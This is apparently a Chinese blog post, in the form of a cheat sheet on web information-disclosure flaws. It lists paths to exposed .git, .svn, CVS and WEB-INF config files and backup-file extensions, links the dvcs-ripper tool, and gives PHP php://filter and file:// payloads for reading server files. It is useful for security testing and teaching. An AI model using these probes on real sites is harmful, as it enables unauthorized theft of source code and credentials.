信息泄露漏洞

通过备份文件或配置文件泄露

  • 一般在根目录下
1. http://www.example.com:port/.hg
2. http://www.example.com:port/robots.txt
3. http://www.example.com:port/.git/config
4. http://www.example.com:port/.svn
5. http://www.example.com:port/WEB-INF/web.xml
6. http://www.example.com:port/WEB-INF/database.properties
7. http://www.example.com:port/CVS/Root
8. http://www.example.com:port/CVS/Entries

利用工具

https://github.com/kost/dvcs-ripper

  • 各个页面下
1. http://www.example.com/index.html(php, jsp…).bak
2. http://www.example.com/.index.html(php, jsp…)~
3. http://www.example.com/index.html(php, jsp…).rar
4. http://www.example.com/index.html(php, jsp…).zip
5. http://www.example.com/index.html(php, jsp…).7z
6. http://www.example.com/index.html(php, jsp…).tar.gz
7. http://www.example.com/.index.html(php, jsp…).swp
8. http://www.example.com/.index.html(php, jsp…).swo
9. http://www.example.com:port/.DS_store

通过协议进行泄露

  • php伪协议
/index.php?f=php://filter/convert.base64-encode/resource=index.php 
  • file协议
/index.php?f=file://D://www/html/about.php
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • Android 自定义View的各种姿势1 Activity的显示之ViewRootImpl详解 Activity...
    passiontim阅读 173,004评论 25 708
  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 134,860评论 18 139
  • 一、Quantum是什么? Quantm是Openstack的网络服务,它的底层是调用第三方软件来创建部署虚拟网络...
    K1024阅读 598评论 0 0
  • 2017、9.11 心情好 今天是特种兵培训第一天,很高兴自己迈出了第一步来到期待已久的特种兵训练营。我...
    燕姐哟阅读 206评论 0 0
  • 我知道这么多年来不能与自己好好相处的原因是,我不爱孤独。 从小到大我都是热闹的人,不会被人群孤立。有人觉得我自信满...
    柒期阅读 216评论 0 4